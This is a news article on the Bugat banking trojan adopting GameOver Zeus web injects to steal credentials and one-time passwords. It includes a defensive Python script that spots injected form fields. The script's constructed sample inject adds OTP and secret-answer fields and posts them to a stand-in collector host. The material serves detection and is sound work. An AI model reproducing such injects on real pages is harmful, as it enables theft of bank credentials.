Bugat Malware Adds GameOver Functionality

The GameOver Zeus botnet, disrupted only two months ago by an international joint operation, continues to echo throughout the cybercrime landscape. For instance, IBM X-Force’s advanced malware researchers have detected a new variant of the Bugat malware that uses almost identical (and somewhat upgraded) GameOver HTML injections, and that is starting to spread throughout the United Kingdom and the Middle East.

Bugat (variously known as Feodo, Geodo and Cridex) keeps its underlying infrastructure unchanged: it does not use the P2P command-and-control approach that GameOver Zeus was famous for, an architecture that made that botnet difficult to track down and disrupt. But the HTML injections and scripts, as well as the structure of the attack Bugat uses against banking applications, are what IBM calls “GOZ-like”—and therefore very dangerous.

The new Bugat malware attack on banking applications includes multiple GOZ-based elements for stealing credentials, overcoming two-factor authentication, evading IP reputation checks and defeating other security controls.

Etay Maor, senior fraud prevention strategist at IBM Security, noted in a blog that in some of the attacks, infected users never reach the real bank login page. Instead, they are directed to a malicious site and are requested to provide their login information.

“In real time, the criminal captures the credentials and connects to the bank via the victim’s IP address,” he said. “This is achieved by Bugat’s back-connect capability, which helps the attacker defeat IP reputation security checks.”

He also explained the multi-step information extraction approach used by the perpetrators. “In case the bank requests more information from the criminal during the transaction process, the criminal can obtain these data elements by using social engineering and [GOZ-like] HTML injection,” he said. “These requests are presented to victims in real time. Such requests can include secret questions and two-factor authentication such as one-time passwords.”
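The injections described above work by adding fields to the bank's genuine login form (one-time password, secret question) and, in some variants, repointing the form at a site the criminal controls. One defensive check a bank or a browser-side integrity agent can run is to diff the form fields and form targets of the page the victim actually sees against a known-good baseline. The script below is an added example, not code from the article or from IBM X-Force; both HTML snippets and the host name `inject-host.invalid` are constructed for illustration.

```python
"""Flag web-inject style additions to a bank login form.

Added example (not from the article or IBM). Compares the form fields and
form targets of a known-good login page against a page as rendered in the
victim's browser and reports anything not present in the baseline. Both HTML
samples are constructed; the drop host is a placeholder (.invalid TLD).
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed baseline: the bank's real login form.
BASELINE_HTML = """
<form id="login" action="https://bank.example/login" method="post">
  <input name="username" type="text">
  <input name="password" type="password">
  <button type="submit">Sign in</button>
</form>
"""

# Constructed sample of the same form after a GOZ-style inject: extra fields
# asking for a one-time password and a secret-question answer, and the form
# now posts to a criminal-controlled host (placeholder domain).
INJECTED_HTML = """
<form id="login" action="https://inject-host.invalid/collect" method="post">
  <input name="username" type="text">
  <input name="password" type="password">
  <input name="otp" type="text" placeholder="Enter the code we sent you">
  <input name="secret_answer" type="text">
  <button type="submit">Sign in</button>
</form>
"""


class FormExtractor(HTMLParser):
    """Collect form action URLs and input names from an HTML document."""

    def __init__(self):
        super().__init__()
        self.actions = []
        self.inputs = set()

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form" and attrs.get("action"):
            self.actions.append(attrs["action"])
        elif tag == "input" and attrs.get("name"):
            self.inputs.add(attrs["name"])


def extract(html):
    parser = FormExtractor()
    parser.feed(html)
    return parser


def find_injections(baseline_html, observed_html):
    """Return inputs added or removed and form targets on unexpected hosts."""
    base = extract(baseline_html)
    seen = extract(observed_html)
    base_hosts = {urlsplit(a).hostname for a in base.actions}
    return {
        "extra_inputs": sorted(seen.inputs - base.inputs),
        "missing_inputs": sorted(base.inputs - seen.inputs),
        "foreign_actions": sorted(
            a for a in seen.actions if urlsplit(a).hostname not in base_hosts
        ),
    }


if __name__ == "__main__":
    report = find_injections(BASELINE_HTML, INJECTED_HTML)
    for key, value in report.items():
        print(f"{key}: {value}")
```

A clean page yields empty lists for all three keys; the constructed injected page reports `otp` and `secret_answer` as extra inputs and the `.invalid` collector as a foreign form target. In practice the baseline is the form as served by the bank, and the observed copy comes from the client (for instance a DOM snapshot collected by a fraud-prevention script), since the injection happens in the victim's browser after the legitimate page has been delivered.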

IBM X-Force research teams have seen a dramatic drop in the number of GameOver-infected devices and in the number of successful fraud attempts since the botnet takedown. However, with this new variant of Bugat malware, the same successful approach seems to be coming back to life through a competing Trojan.

“There are two possible explanations for this,” said Maor. “First, someone from the GOZ group could have moved to the Bugat team. This would not be the first time something like this has happened, which we’ve witnessed in other cases involving Zeus and Citadel; however, it is not very likely in this case since Bugat and GOZ are essentially competitors, while Zeus and Citadel are closely related.”

He added, “The second and more likely explanation is that the Bugat team could have analyzed and perhaps reversed the GOZ malware before copying the HTML injections that made GOZ so highly profitable for its operators.”

This is not the first time that the Bugat team copied or reused other proven attack methods, “so IBM researchers will continue to monitor and analyze new malware variants for both original and borrowed fraud techniques,” Maor said.
